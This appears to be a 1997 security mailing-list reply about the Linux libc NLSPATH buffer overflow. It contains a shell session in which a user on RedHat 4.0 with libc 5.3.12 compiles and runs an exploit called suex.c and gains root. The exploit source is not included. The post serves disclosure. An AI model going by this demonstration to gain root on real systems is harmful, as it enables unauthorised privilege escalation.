Re: Linux NLSPATH buffer overflow

[mike () thai oxy pub ro (Mihai Sandu)]

On Fri, 14 Feb 1997, Alan Cox wrote:

> libc5.4 is immune, RedHat has been shipping the fixed libc5.3.12 for a long
> time, and all the vendors I had security contacts for where told ages ago.
> If they haven't fixed it then Im disappointed with them, they dont have
> an excuse. That libc5.3.12 unpatched also has other fun bugs with buffer
> overruns in libc some in the BSD stuff akin to the BSD bugs in rcmd() etc.
>
> Alan

[squid@arbat squid]$ cat /etc/redhat-release
release 4.0 (Colgate)
[squid@arbat squid]$ uname -a
Linux arbat.ase.ro 2.0.18 #3 Fri Mar 7 11:28:49 EET 1997 i586
[squid@arbat squid]$ id
uid=500(squid) gid=500(squid) groups=100(users),500(squid)
[squid@arbat squid]$ ls -la /lib/libc*
lrwxrwxrwx   1 root     root           14 Feb 21 14:52 /lib/libc.so.5 -> libc.so.5.3.12
-rwxr-xr-x   1 root     root       705995 Sep  2  1996 /lib/libc.so.5.3.12
lrwxrwxrwx   1 root     root           22 Feb 21 14:57 /lib/libcom_err.so -> /lib/libcom_err.so.2.0
lrwxrwxrwx   1 root     root           17 Feb 21 14:59 /lib/libcom_err.so.2 -> libcom_err.so.2.0
-rwxr-xr-x   1 root     root         5819 Sep  1  1996 /lib/libcom_err.so.2.0

Naaaaahhhh! It won't work.... :(
But what a hell let's try!

[squid@arbat squid]$ cc -o suex suex.c
[squid@arbat squid]$ ./suex
bash# id
uid=0(root) gid=500(squid) egid=0(root) groups=100(users),500(squid)

Whooops.. it worked :)

So. It works on RedHat 4.0 Colgate with libc v. 5.3.12

With all my best regards,

        Sandu Mihai